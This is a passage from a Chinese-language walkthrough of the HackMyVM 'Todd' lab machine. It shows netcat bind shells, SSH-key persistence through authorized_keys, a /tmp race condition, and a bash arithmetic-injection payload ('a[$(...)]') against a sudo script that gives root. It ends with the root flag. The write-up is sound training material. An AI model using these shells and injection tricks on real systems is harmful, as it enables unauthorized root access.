PID=3938   | \/bin\/bash \/opt\/create_nc.sh \n2025\/06\/26 12:33:12 CMD: UID=1000  PID=3937   | nc -e \/opt\/fake_ssh -lp 9968 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3936   | sudo -u todd nc -e \/opt\/fake_ssh -lp 9968 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3934   | \/bin\/bash \/opt\/create_nc.sh \n2025\/06\/26 12:33:12 CMD: UID=1000  PID=3933   | nc -e \/opt\/fake_ssh -lp 26178 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3931   | sudo -u todd nc -e \/opt\/fake_ssh -lp 26178 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3929   | \/bin\/bash \/opt\/create_nc.sh \n2025\/06\/26 12:33:12 CMD: UID=1000  PID=3928   | bash \n2025\/06\/26 12:33:12 CMD: UID=1000  PID=3927   | nc -e \/opt\/fake_ssh -lp 24826 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3926   | sudo -u todd nc -e \/bin\/bash -lp 7066 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3925   | sudo -u todd nc -e \/opt\/fake_ssh -lp 24826 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3924   | \/bin\/bash \/opt\/create_nc2.sh \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3922   | \/bin\/bash \/opt\/create_nc.sh \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3646   | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3566   | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3144   | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=2778   | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=1555   | \n2025\/06\/26 12:33:12 CMD: UID=33    PID=452    | \/usr\/sbin\/apache2 -k start \n2025\/06\/26 12:33:12 CMD: UID=33    PID=451    | \/usr\/sbin\/apache2 -k start \n2025\/06\/26 12:33:12 CMD: UID=0     PID=449    | \/usr\/sbin\/apache2 -k start \n2025\/06\/26 12:33:12 CMD: UID=0     PID=418    | \/usr\/sbin\/sshd -D \n2025\/06\/26 12:33:12 CMD: UID=0     PID=401    | \/sbin\/agetty -o -p -- \\u --noclear tty1 linux \n2025\/06\/26 12:33:12 CMD: UID=0     PID=372    | \/usr\/sbin\/rsyslogd -n -iNONE \n2025\/06\/26 12:33:12 CMD: UID=104   PID=371    | \/usr\/bin\/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only \n2025\/06\/26 12:33:12 CMD: UID=0     PID=367    | \/usr\/sbin\/cron -f \n2025\/06\/26 12:33:12 CMD: UID=0     PID=365    | \/lib\/systemd\/systemd-logind \n2025\/06\/26 12:33:12 CMD: UID=0     PID=364    | \/sbin\/dhclient -4 -v -i -pf \/run\/dhclient.enp0s3.pid -lf \/var\/lib\/dhcp\/dhclient.enp0s3.leases -I -df \/var\/lib\/dhcp\/dhclient6.enp0s3.leases enp0s3 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=305    | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=304    | \n2025\/06\/26 12:33:12 CMD: UID=101   PID=247    | \/lib\/systemd\/systemd-timesyncd \n2025\/06\/26 12:33:12 CMD: UID=0     PID=239    | \/lib\/systemd\/systemd-udevd \n2025\/06\/26 12:33:12 CMD: UID=0     PID=219    | \/lib\/systemd\/systemd-journald \n2025\/06\/26 12:33:12 CMD: UID=0     PID=187    | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=186    | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=184    | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=153    | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=120    | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=118    | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=117    | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=116    | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=114    | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=111    | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=109    | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=108    | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=59     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=49     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=48     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=30     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=29     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=28     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=27     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=26     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=25     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=24     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=23     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=22     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=21     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=20     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=19     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=18     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=17     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=16     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=15     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=14     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=12     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=11     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=10     | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=9      | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=8      | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=6      | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=4      | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3      | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=2      | \n2025\/06\/26 12:33:12 CMD: UID=0     PID=1      | \/sbin\/init \n2025\/06\/26 12:33:12 CMD: UID=0     PID=4029   | \/sbin\/init \n2025\/06\/26 12:33:13 CMD: UID=0     PID=4030   | \/sbin\/init \n2025\/06\/26 12:33:14 CMD: UID=0     PID=4031   | \/sbin\/init \n2025\/06\/26 12:33:15 CMD: UID=0     PID=4032   | \/sbin\/init \n2025\/06\/26 12:33:17 CMD: UID=0     PID=4033   | \/sbin\/init \n2025\/06\/26 12:33:18 CMD: UID=0     PID=4034   | \/sbin\/init \n2025\/06\/26 12:33:19 CMD: UID=0     PID=4035   | \/sbin\/init \n2025\/06\/26 12:33:20 CMD: UID=0     PID=4036   | \/sbin\/init \n2025\/06\/26 12:33:22 CMD: UID=0     PID=4037   | \/sbin\/init \n2025\/06\/26 12:33:23 CMD: UID=0     PID=4038   | \/sbin\/init \n2025\/06\/26 12:33:24 CMD: UID=0     PID=4039   | \/sbin\/init \n2025\/06\/26 12:33:25 CMD: UID=0     PID=4040   | \/sbin\/init \n2025\/06\/26 12:33:27 CMD: UID=0     PID=4041   | (bash) \n2025\/06\/26 12:33:28 CMD: UID=0     PID=4042   | \/sbin\/init \n2025\/06\/26 12:33:29 CMD: UID=0     PID=4043   | \/sbin\/init \n2025\/06\/26 12:33:30 CMD: UID=0     PID=4044   | \/sbin\/init \n2025\/06\/26 12:33:32 CMD: UID=0     PID=4045   | (bash) \n2025\/06\/26 12:33:33 CMD: UID=0     PID=4046   | \/sbin\/init \n2025\/06\/26 12:33:34 CMD: UID=0     PID=4047   | \/sbin\/init \n2025\/06\/26 12:33:35 CMD: UID=0     PID=4048   | \/sbin\/init \n2025\/06\/26 12:33:37 CMD: UID=0     PID=4049   | (bash) \n2025\/06\/26 12:33:38 CMD: UID=0     PID=4050   | \/sbin\/init \n2025\/06\/26 12:33:39 CMD: UID=0     PID=4051   | (bash) \n2025\/06\/26 12:33:40 CMD: UID=0     PID=4052   | \/sbin\/init \n2025\/06\/26 12:33:42 CMD: UID=0     PID=4053   | (bash) \n2025\/06\/26 12:33:43 CMD: UID=0     PID=4054   | \/sbin\/init \n2025\/06\/26 12:33:44 CMD: UID=0     PID=4055   | (bash) \n2025\/06\/26 12:33:45 CMD: UID=0     PID=4056   | (bash) \n2025\/06\/26 12:33:47 CMD: UID=0     PID=4057   | \/sbin\/init \n2025\/06\/26 12:33:48 CMD: UID=0     PID=4058   | \/sbin\/init \n2025\/06\/26 12:33:49 CMD: UID=0     PID=4059   | (bash) \n2025\/06\/26 12:33:50 CMD: UID=0     PID=4060   | \/sbin\/init \n2025\/06\/26 12:33:52 CMD: UID=0     PID=4061   | \/sbin\/init \n2025\/06\/26 12:33:53 CMD: UID=0     PID=4062   | \/sbin\/init \n2025\/06\/26 12:33:54 CMD: UID=0     PID=4063   | (bash) \n2025\/06\/26 12:33:54 CMD: UID=0     PID=4064   | \n2025\/06\/26 12:33:55 CMD: UID=0     PID=4065   | \/sbin\/init \n2025\/06\/26 12:33:57 CMD: UID=0     PID=4066   | (bash) \n2025\/06\/26 12:33:58 CMD: UID=0     PID=4067   | (bash) \n2025\/06\/26 12:33:59 CMD: UID=0     PID=4068   | (bash) \n2025\/06\/26 12:34:00 CMD: UID=0     PID=4069   | \/sbin\/init \n2025\/06\/26 12:34:01 CMD: UID=0     PID=4072   | \/usr\/sbin\/cron -f \n2025\/06\/26 12:34:01 CMD: UID=0     PID=4071   | \/usr\/sbin\/cron -f \n2025\/06\/26 12:34:01 CMD: UID=0     PID=4070   | \/usr\/sbin\/cron -f \n2025\/06\/26 12:34:01 CMD: UID=0     PID=4073   | \/usr\/sbin\/CRON -f \n2025\/06\/26 12:34:01 CMD: UID=0     PID=4075   | \/usr\/sbin\/CRON -f \n2025\/06\/26 12:34:01 CMD: UID=0     PID=4074   | \/usr\/sbin\/CRON -f \n2025\/06\/26 12:34:01 CMD: UID=0     PID=4077   | \/bin\/sh -c \/bin\/bash \/opt\/create_nc2.sh \n2025\/06\/26 12:34:01 CMD: UID=0     PID=4076   | \/bin\/sh -c \/bin\/bash \/opt\/create_nc.sh \n2025\/06\/26 12:34:01 CMD: UID=0     PID=4078   | \/bin\/sh -c \/bin\/bash \/opt\/kill_todd.sh \n2025\/06\/26 12:34:01 CMD: UID=0     PID=4079   | \/bin\/bash \/opt\/create_nc.sh \n2025\/06\/26 12:34:01 CMD: UID=0     PID=4080   | \/bin\/bash \/opt\/create_nc2.sh \n2025\/06\/26 12:34:01 CMD: UID=0     PID=4081   | \/bin\/bash \/opt\/kill_todd.sh \n2025\/06\/26 12:34:01 CMD: UID=0     PID=4082   | \/bin\/bash \/opt\/create_nc2.sh \n2025\/06\/26 12:34:01 CMD: UID=0     PID=4083   | \/bin\/bash \/opt\/create_nc.sh<\/code><\/pre>\n<p>\u60f3\u529e\u6cd5\u770b\u4e00\u4e0b\u8fd9\u51e0\u4e2a\u5947\u602a\u7684\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">ls -la\ntotal 40\ndrwxr-xr-x  2 root root  4096 Mar 22 10:40 .\ndrwxr-xr-x 18 root root  4096 Nov 13  2020 ..\n-rwx------  1 root root   138 Mar 22 08:00 create_nc2.sh\n-rwx---r--  1 root root   141 Mar 22 07:42 create_nc.sh\n-rwx------  1 root root 16608 Mar 22 07:21 fake_ssh\n-rwx------  1 root root    17 Mar 22 07:07 kill_todd.sh\ncat create_nc.sh\n#!\/bin\/bash\n\ncreate_ssh(){\n        sudo -u todd nc -e \/opt\/fake_ssh -lp $1\n}\n\nfor i in $(seq 10)\ndo\n        a=$((RANDOM))\n        sleep 0.2\n        create_ssh $a &amp;\ndone<\/code><\/pre>\n<p>\u8fd9\u6837\u4e5f\u4e0d\u662f\u4e8b\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u516c\u94a5\u4e0a\u53bb\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ ssh-keygen -t rsa -f \/home\/kali\/temp\/Todd\/id_rsa\nGenerating public\/private rsa key pair.\nEnter passphrase for &quot;\/home\/kali\/temp\/Todd\/id_rsa&quot; (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/Todd\/id_rsa\nYour public key has been saved in \/home\/kali\/temp\/Todd\/id_rsa.pub\nThe key fingerprint is:\nSHA256:MQHIwedy5vtuVpIxX8I0xZU6GQ8m8OjnI0yR+OlZkbQ kali@kali\nThe key&#039;s randomart image is:\n+---[RSA 3072]----+\n|   o.o..o..o.... |\n|    + .. *+o= .  |\n|     o. *oE+ *   |\n|    . +oo=o.= .  |\n|     =  S=oo .   |\n|      .+o=o      |\n|       .=oo      |\n|      . o. .     |\n|       =o        |\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ cat id_rsa.pub \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCXRUWsz51cJEiYajudUhHcU0Rfpnrc+Kru+zUI7exnbTc99gyOtIxx+gRzG3184kT0YU1VrE7pH8GiJJ+amAqc0GkJWt6Wesypza3kEmtiPKE6673aREYxCI\/1miqfT6CaSBdNqlXv0iBJIfsw\/O3n8B8vLRvfjADEU7jl6h+UfWhpxFh4ASeG8lCTmnW5GpvgK0cx2lePKhyXRT8CG0AVE67vQG1U9GWcZKAgIKIuOFSGpTSwcfg1L85nLfSR3sAJu\/DMhy4Qx1zbWhYLKcFn5FNYJdr3F0gV0iNCctWKEB1J\/0vPJckD0md9g\/BsEaS7A6VHmTxnEdP09iv4N7qVtEFWsDDNeur2eLcEetlZI+SG\/INESUzJEhBviXJJxKPl03O0S\/rgtkTy3AsYlVpP8uy55KHB+Pzn90bmviRub+NBo63S867z6IkvY\/uUV0309eCEuvZai1IFf3SSsZ4LQIjGqyMJADGVm3EIb9mcEIwYvP5Gjpnu9X5U+G6fLAE= kali@kali<\/code><\/pre>\n<p>\u7136\u540e\u5c1d\u8bd5\u6dfb\u52a0\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ nc $IP 7066   \npwd\n\/root\ncd \/home\/todd\/\nls -la\ntotal 24\ndrwxr-xr-x 2 todd todd 4096 Mar 22 08:03 .\ndrwxr-xr-x 3 root root 4096 Mar 22 06:53 ..\nlrwxrwxrwx 1 root root    9 Mar 22 08:03 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 todd todd  220 Apr 18  2019 .bash_logout\n-rw-r--r-- 1 todd todd 3526 Apr 18  2019 .bashrc\n-rw-r--r-- 1 todd todd  807 Apr 18  2019 .profile\n-rw-r--r-- 1 todd todd   39 Mar 22 06:54 user.txt\nmkdir .ssh\ncd .ssh\npwd\n\/home\/todd\/.ssh\necho &#039;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCXRUWsz51cJEiYajudUhHcU0Rfpnrc+Kru+zUI7exnbTc99gyOtIxx+gRzG3184kT0YU1VrE7pH8GiJJ+amAqc0GkJWt6Wesypza3kEmtiPKE6673aREYxCI\/1miqfT6CaSBdNqlXv0iBJIfsw\/O3n8B8vLRvfjADEU7jl6h+UfWhpxFh4ASeG8lCTmnW5GpvgK0cx2lePKhyXRT8CG0AVE67vQG1U9GWcZKAgIKIuOFSGpTSwcfg1L85nLfSR3sAJu\/DMhy4Qx1zbWhYLKcFn5FNYJdr3F0gV0iNCctWKEB1J\/0vPJckD0md9g\/BsEaS7A6VHmTxnEdP09iv4N7qVtEFWsDDNeur2eLcEetlZI+SG\/INESUzJEhBviXJJxKPl03O0S\/rgtkTy3AsYlVpP8uy55KHB+Pzn90bmviRub+NBo63S867z6IkvY\/uUV0309eCEuvZai1IFf3SSsZ4LQIjGqyMJADGVm3EIb9mcEIwYvP5Gjpnu9X5U+G6fLAE= kali@kali&#039; &gt; authorized_keys                \nls -la\ntotal 12\ndrwxr-xr-x 2 todd todd 4096 Jun 26 12:40 .\ndrwxr-xr-x 3 todd todd 4096 Jun 26 12:40 ..\n-rw-r--r-- 1 todd todd  563 Jun 26 12:40 authorized_keys<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142220.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142220.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250627004136419\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u8fd8\u662f\u4f1a\u88ab\u6740\u6389\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142221.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142221.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250627004236837\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u731c\u6d4b\u53ef\u80fd\u662f<code>kill_todd.sh<\/code>\u8d77\u4f5c\u7528\u4e86\uff0c\u6b63\u597d\u6211\u4eec\u62e5\u6709<code>sudo rm<\/code>\uff0c\u76f4\u63a5\u8fdb\u884c\u5220\u9664\uff01<\/p>\n<pre><code class=\"language-bash\">todd@todd:~$ sudo \/usr\/bin\/rm \/opt\/kill_todd.sh<\/code><\/pre>\n<p>\u7136\u540e\u5c31\u4e0d\u4f1a\u5f39\u51fa\u53bb\u4e86\uff01\uff01\uff01<\/p>\n<h3>\u65b9\u6cd5\u4e00\uff1a\u6761\u4ef6\u7ade\u4e89\uff08\u55df\u6765\u4e4b\u98df\uff09<\/h3>\n<p>\u63a5\u4e0b\u6765\u4e13\u5fc3\u7814\u7a76\u4e00\u4e0b\u4e0b\u9762\u8fd9\u4e2a\uff1a<\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\n\ncat &lt;&lt; EOF\n                                   .     **\n                                *           *.\n                                              ,*\n                                                 *,\n                         ,                         ,*\n                      .,                              *,\n                    \/                                    *\n                 ,*                                        *,\n               \/.                                            .*.\n             *                                                  **\n             ,*                                               ,*\n                **                                          *.\n                   **                                    **.\n                     ,*                                **\n                        *,                          ,*\n                           *                      **\n                             *,                .*\n                                *.           **\n                                  **      ,*,\n                                     ** *,     HackMyVM\nEOF\n\n# check this script used by human \na=$((RANDOM%1000))\necho &quot;Please Input [$a]&quot;\n\necho &quot;[+] Check this script used by human.&quot;\necho &quot;[+] Please Input Correct Number:&quot;\nread -p &quot;&gt;&gt;&gt;&quot; input_number\n\n[[ $input_number -ne &quot;$a&quot; ]] &amp;&amp; exit 1\n\nsleep 0.2\ntrue_file=&quot;\/tmp\/$((RANDOM%1000))&quot;\nsleep 1\nfalse_file=&quot;\/tmp\/$((RANDOM%1000))&quot;\n\n[[ -f &quot;$true_file&quot; ]] &amp;&amp; [[ ! -f &quot;$false_file&quot; ]] &amp;&amp; cat \/root\/.cred || exit 2<\/code><\/pre>\n<p>\u6d4b\u8bd5\u662f\u5426\u662f\u4eba\u7c7b\uff0c\u751f\u6210\u4e24\u4e2a\u968f\u673a\u6587\u4ef6\u540d\uff081000 \u4ee5\u5185\uff09\uff0c\u82e5\u5176\u4e2d\u4e00\u4e2a\u5b58\u5728\u800c\u53e6\u4e00\u4e2a\u4e0d\u5b58\u5728\u5373\u8bfb\u53d6 root \u7684\u51ed\u8bc1\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u8fdb\u884c\u6761\u4ef6\u7ade\u4e89\uff1a<\/p>\n<pre><code class=\"language-bash\">todd@todd:\/tmp$ while true; do for i in {1..1000}; do touch $i &amp;&amp; sleep 1 &amp;&amp; rm $i; done; done<\/code><\/pre>\n<p>\u7136\u540e\u5c1d\u8bd5\u8fd0\u884c\u7a0b\u5e8f\uff0c\u4f46\u662f\u6211\u8fd9\u8fb9\u5f39\u4e0d\u8fc7\u6765\uff0c\u53ef\u80fd\u662f\u56e0\u4e3a rm \u5220\u9664\u8fc7\u6162\uff1f\u5c1d\u8bd5rsync\u4f46\u662f\u53d1\u73b0\u7cfb\u7edf\u4e0a\u6ca1\u6709\u3002\u3002\u3002\u3002<\/p>\n<p>\u5c1d\u8bd5\u7559\u4e0b\u6587\u4ef6\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">todd@todd:\/tmp$ for i in {1..250}; do touch $i; done<\/code><\/pre>\n<p>\u591a\u6267\u884c\u51e0\u6b21\u7a0b\u5e8f\uff0c\u4e00\u6837\u53ef\u4ee5\u5f39\u56de\u6765\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">todd@todd:~$ sudo \/bin\/bash \/srv\/guess_and_check.sh\n                                   .     **\n                                *           *.\n                                              ,*\n                                                 *,\n                         ,                         ,*\n                      .,                              *,\n                    \/                                    *\n                 ,*                                        *,\n               \/.                                            .*.\n             *                                                  **\n             ,*                                               ,*\n                **                                          *.\n                   **                                    **.\n                     ,*                                **\n                        *,                          ,*\n                           *                      **\n                             *,                .*\n                                *.           **\n                                  **      ,*,\n                                     ** *,     HackMyVM\nPlease Input [423]\n[+] Check this script used by human.\n[+] Please Input Correct Number:\n>&gt;&gt;423\nfake password<\/code><\/pre>\n<p>\u5f88\u96f7\u7684\u662f\uff0c<code>fake password<\/code>\u5c31\u662f\u5bc6\u7801\u3002\u3002\u3002\u3002\u3002\u56e0\u4e3a\u5176\u4ed6\u7684\u6ca1\u8f93\u51fa\uff0c\u53ea\u6709\u8fd9\u4e2a\u6709\u8f93\u51fa\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142222.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142222.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250627011153356\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h3>\u65b9\u6cd5\u4e8c\uff1a\u5f31\u6bd4\u8f83\u903b\u8f91\uff08\u9884\u671f\u89e3\uff09<\/h3>\n<p>\u6ce8\u610f\u5230\uff1a<code>-ne<\/code>\u8fd9\u662f\u4e00\u4e2a\u5f31\u6bd4\u8f83\u903b\u8f91\uff0c\u8f93\u5165\u7684\u53ef\u4ee5\u662f\u5b57\u7b26\uff0c\u901a\u914d\u7b26\u751a\u81f3\u662f\u6570\u7ec4\uff0c\u8fd9\u5c31\u5bfc\u81f4\u4e86\u53ef\u4ee5\u6267\u884c\u4efb\u610f\u4ee3\u7801\u7684\u6f0f\u6d1e\uff0c\u6216\u8005\u5f88\u65b9\u4fbf\u7684\u5c31\u53ef\u4ee5\u7528\u901a\u914d\u7b26\u4ee3\u66ff\u89e3\u6cd5\u4e00\u91cc\u7684\u8f93\u5165\uff1a<\/p>\n<pre><code class=\"language-bash\">todd@todd:~$ echo &#039;*&#039; | sudo \/bin\/bash \/srv\/guess_and_check.sh\n                                   .     **\n                                *           *.\n                                              ,*\n                                                 *,\n                         ,                         ,*\n                      .,                              *,\n                    \/                                    *\n                 ,*                                        *,\n               \/.                                            .*.\n             *                                                  **\n             ,*                                               ,*\n                **                                          *.\n                   **                                    **.\n                     ,*                                **\n                        *,                          ,*\n                           *                      **\n                             *,                .*\n                                *.           **\n                                  **      ,*,\n                                     ** *,     HackMyVM\nPlease Input [214]\n[+] Check this script used by human.\n[+] Please Input Correct Number:\n\/srv\/guess_and_check.sh: line 35: [[: *: syntax error: operand expected (error token is &quot;*&quot;)\nfake password<\/code><\/pre>\n<p>\u81f3\u4e8e\u4efb\u610f\u4ee3\u7801\u6267\u884c\uff0c\u5219\u662f\u89e3\u6790\u4e86\u6570\u7ec4\u91cc\u7684\u7b26\u53f7\u5bfc\u81f4\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">todd@todd:~$ sudo \/bin\/bash \/srv\/guess_and_check.sh\n                                   .     **\n                                *           *.\n                                              ,*\n                                                 *,\n                         ,                         ,*\n                      .,                              *,\n                    \/                                    *\n                 ,*                                        *,\n               \/.                                            .*.\n             *                                                  **\n             ,*                                               ,*\n                **                                          *.\n                   **                                    **.\n                     ,*                                **\n                        *,                          ,*\n                           *                      **\n                             *,                .*\n                                *.           **\n                                  **      ,*,\n                                     ** *,     HackMyVM\nPlease Input [355]\n[+] Check this script used by human.\n[+] Please Input Correct Number:\n>&gt;&gt;a[$(whoami;id;pwd)]\n\/srv\/guess_and_check.sh: line 35: root\nuid=0(root) gid=0(root) groups=0(root)\n\/home\/todd: syntax error in expression (error token is &quot;uid=0(root) gid=0(root) groups=0(root)\n\/home\/todd&quot;)<\/code><\/pre>\n<p>\u8fd9\u5c31\u53ef\u4ee5\u8fdb\u884c\u4e00\u5b9a\u7a0b\u5ea6\u4e0a\u7684\u5229\u7528\u4e86\uff0c\u5982\u679c\u6539\u4e3a<code>-eq<\/code>\u5c31\u65e0\u6cd5\u8fdb\u884c\u5229\u7528\u4e86\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">todd@todd:~$ su root\nPassword: \nroot@todd:\/home\/todd# cd ~\nroot@todd:~# ls -la\ntotal 40\ndrwx------  4 root root 4096 Mar 22 11:08 .\ndrwxr-xr-x 18 root root 4096 Nov 13  2020 ..\nlrwxrwxrwx  1 root root    9 Feb 18 07:57 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  571 Mar 22 08:06 .bashrc\n-rw-r--r--  1 root root   14 Mar 22 08:30 .cred\ndrwxr-xr-x  3 root root 4096 Nov 13  2020 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-------  1 root root   39 Mar 22 06:44 root.txt\n-rw-r--r--  1 root root   66 Nov 13  2020 .selected_editor\ndrwxr-xr-x  2 root root 4096 Mar 22 06:32 .ssh\n-rw-------  1 root root 1443 Mar 22 11:08 .viminfo\nroot@todd:~# cat root.txt \nTodd{389c9909b8d6a701217a45104de7aa21}\nroot@todd:~# cat .cred \nfake password<\/code><\/pre>\n<p>\u771f\u662f\u4e00\u4e2a\u6709\u610f\u601d\u7684\u9776\u673a\uff01\uff01\uff01\uff01\u611f\u8c22\u7fa4\u4e3b\u7684\u9776\u673a\uff01\uff01\uff01<\/p>\n<h2>\u76f8\u5173\u4fe1\u606f<\/h2>\n<h3>opt\u6587\u4ef6<\/h3>\n<pre><code class=\"language-bash\">root@todd:\/opt# ls -la\ntotal 36\ndrwxr-xr-x  2 root root  4096 Jun 26 12:43 .\ndrwxr-xr-x 18 root root  4096 Nov 13  2020 ..\n-rwx------  1 root root   138 Mar 22 08:00 create_nc2.sh\n-rwx---r--  1 root root   141 Mar 22 07:42 create_nc.sh\n-rwx------  1 root root 16608 Mar 22 07:21 fake_ssh\nroot@todd:\/opt# file *\ncreate_nc2.sh: Bourne-Again shell script, ASCII text executable\ncreate_nc.sh:  Bourne-Again shell script, ASCII text executable\nfake_ssh:      ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=5ae97f3e1a5e6a6cd1e5e3db82cfea9a4f56b940, not stripped\nroot@todd:\/opt# cat create_nc.sh\n#!\/bin\/bash\n\ncreate_ssh(){\n        sudo -u todd nc -e \/opt\/fake_ssh -lp 